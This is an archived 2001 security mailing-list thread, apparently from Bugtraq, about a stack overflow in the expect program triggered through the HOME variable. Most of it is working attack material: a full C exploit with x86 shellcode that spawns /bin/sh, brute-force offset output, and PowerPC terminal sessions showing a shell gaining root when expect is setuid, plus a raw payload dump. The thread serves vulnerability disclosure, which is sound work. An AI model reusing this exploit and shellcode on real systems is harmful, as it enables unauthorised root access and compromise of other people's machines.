Re: Returned post ... Expect overflows

From: KF (dotslashat_private)
Date: Fri Jun 08 2001 - 02:10:56 PDT
Next message: Jason Slagle: "Re: bash overflows"
Previous message: Vitaly Osipov: "Re: script locations"
In reply to: Charles Stevenson: "Re: [Fwd: [Fwd: Returned post for bugtraqat_private]]"
Next in thread: Charles Stevenson: "Expect Overflow (Continued)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I am not sure who has access to Cray boxes... but expect MUST be suid on
Cray... and from 
reading their FAQ it seems to me like a common troubleshooting method
when expect does not 
work is to make it suid... 

If people are going to continue to comment on this can we agree to use a
sensible title...
I didn't mean to forward it on to the list with the title it ended up
with... 
-KF

Charles Stevenson wrote:
> 
> F*#! i sent the wrong paste (lol)... yes the easiest expect exploit if it
> was suid would be to call it directly... ;-)
> 
> here is the paste i meant to send
> 
> [-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512
> [ Buffer size:  512             Egg size:       2048    Aligment:       0]
> [ Address:      0x100111f8      Offset:         0                        ]
> sh-2.05$ export HOME=$EGG
> sh-2.05$ id
> uid=1000(core) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio)
> sh-2.05$ /usr/bin/expect
> sh-2.05# id
> uid=0(root) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio)
> sh-2.05# ps
>   PID TTY          TIME CMD
>  1791 pts/5    00:00:00 sh
>  1793 pts/5    00:00:00 ps
> sh-2.05# exit
> sh-2.05$ echo $HOME
> ÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿû
> xÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿ
> ûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx|Æ2x/?ÿA¼|h¦°Ãÿµ°Ãÿ°Ãÿ?ÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx8?ð8¦ô8æó|¥"x|ç"x|?:|Ä®|Ä*|ç(P|?*|¤"|¤*|(P|e|cxDÿÿ|£+x|À3x|Æ2x|§:|¥*|c!.|f"|Å!.|¥*xDÿÿ|à;xDÿÿÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx|Æ2xKÿþý/bin/shZÿÿÿÿÿÿÿÿ
> 
> Assigning the contents of $EGG to $HOME being the key... sorry folks about
> the earlier blunder... ;-)
> 
> Best Regards,
> Charles Stevenson
> 
> Charles Stevenson wrote:
> 
> > Kevin,
> >
> > Here's the PPC shellcode info you asked for:
> >
> > This is mainly a post of my PowerPC exploit efforts... anyways... Just
> > for grins I tested a scenario under Debian PowerPC GNU/Linux with:
> >
> > ii  expect5.31     5.31.8-3       A program that "talks" to other
> > programs.
> >
> > [-(core@euclid:~/sploits/shellcode/reet)> sudo chmod 4755 /usr/bin/expect
> >
> > [-(core@euclid:~/sploits/shellcode/reet)> ls -lL /usr/bin/expect
> > -rwsr-xr-x    1 root     root         4328 Sep 20  2000 /usr/bin/expect
> > [-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512
> > [ Buffer size:  512             Egg size:       2048    Aligment:
> > 0]
> > [ Address:      0x100111f8      Offset:         0
> > ]
> > sh-2.05$ id
> > uid=1000(core) gid=1000(core)
> > groups=1000(core),4(adm),24(cdrom),29(audio)
> > sh-2.05$ /usr/bin/expect
> > expect1.1> id
> > uid=1000(core) gid=1000(core) euid=0(root)
> > groups=1000(core),4(adm),24(cdrom),29(audio)
> > expect1.2>
> >
> > If you find a program that calls expect suid let me know ;-)
> >
> > Best Regards,
> > Charles Stevenson
> >
> > P.S. the "reet" tools I wrote to add PowerPC support are based on Aleph
> > One's smashstack code.  It's available at:
> > http://www.ezlink.com/~core/files/reet.tar.gz (Comments welcome:)
> >
> > > I have found an overflow in and coded the exploit code for several
> > > versions of /usr/bin/expect... on SCO , linux, and BSD variants. I am
> > > unable to think of a situation where this would be useful due to the
> > > fact that expect is not suid...can anyone help me determine if this is
> > > exploitable to obtain root? Perhaps a suid expect script could be
> > > exploited? or maybe something like suid kppp which calls expect as a
> > > helper program?
> > >
> > > [root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
> > > [root@linux elguapo]# expect
> > > Segmentation fault (core dumped)
> > >
> > > -Kevin Finisterre
> > > dotslashat_private
> > > --------------54785D81E19EEAA4D65A5A40
> > > Content-Transfer-Encoding: 7bit
> > > Content-Type: text/plain; charset=us-ascii;
> > >  name="expect.c"
> > > Content-Disposition: inline;
> > >  filename="expect.c"
> > >
> > > //krfinisterreat_private or dotslashat_private
> > > //this is output from my brute script...
> > > //722
> > > //Stack pointer: 0xbffffa18
> > > //       Offset: 0x2d3
> > > //  Return addr: 0xbffff745
> > > //stack/brute.sh: line 11:  2190 Illegal instruction     (core dumped)
> > > $3
> > > $L
> > > //723
> > > //Stack pointer: 0xbffffa18
> > > //       Offset: 0x2d4
> > > //  Return addr: 0xbffff744
> > > //sh-2.04#
> > > //note that I was root when I ran this ... expect is not suid
> > >
> > > #define BUFFERSIZE 533
> > >
> > > unsigned long sp(void)
> > > {
> > >         __asm__("movl %esp, %eax");
> > > }
> > >
> > > int main(int argc,char **argv)
> > > {
> > >   char hell[] =
> > >         "\x29\xc0"
> > >         "\x29\xc0"
> > >         "\xb0\x47"
> > >         "\x29\xdb"
> > >         "\xb3\x0c"
> > >         "\x89\xd9"
> > >         "\xcd\x80"
> > >         "\x5e"
> > >         "\x29\xc0"
> > >         "\x88\x46\x07"
> > >         "\x89\x46\x0c"
> > >         "\x89\x76\x08"
> > >         "\xb0\x0b"
> > >         "\x87\xf3"
> > >         "\x8d\x4b\x08"
> > >         "\x8d\x53\x0c"
> > >         "\xcd\x80"
> > >         "\xe8\xe3\xff\xff\xff"
> > >         "\x2f\x62\x69\x6e\x2f\x73\x68";
> > >         int i;
> > >         int offset;
> > >         long esp;
> > >         long ret;
> > >         long *addr_ptr;
> > >         char *buffer, *ptr;
> > >         offset = atoi(argv[1]);
> > >         esp = sp();
> > >         ret = esp-offset;
> > >
> > >         if(!(buffer = malloc(BUFFERSIZE)))
> > >         {
> > >                 printf("oops\n");
> > >                 exit(-1);
> > >         }
> > >
> > >         ptr = buffer;
> > >         addr_ptr = (long *)ptr;
> > >         for (i=0; i<BUFFERSIZE; i+=4)
> > >                 *(addr_ptr++) = ret;
> > >
> > >         for (i=0; i<BUFFERSIZE/2; i++)
> > >                 buffer[i] = '\xeb02';
> > >
> > >         ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
> > >         for(i=0; i<strlen(hell); i++)
> > >                 *(ptr++) = hell[i];
> > >
> > >         buffer[BUFFERSIZE-1] = 0;
> > >
> > >         setenv("HOME", buffer, 1);
> > >         execlp("/usr/bin/expect", 0);
> > > }
> > >
> > > --------------54785D81E19EEAA4D65A5A40--
Next message: Jason Slagle: "Re: bash overflows"
Previous message: Vitaly Osipov: "Re: script locations"
In reply to: Charles Stevenson: "Re: [Fwd: [Fwd: Returned post for bugtraqat_private]]"
Next in thread: Charles Stevenson: "Expect Overflow (Continued)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Fri Jun 08 2001 - 10:18:39 PDT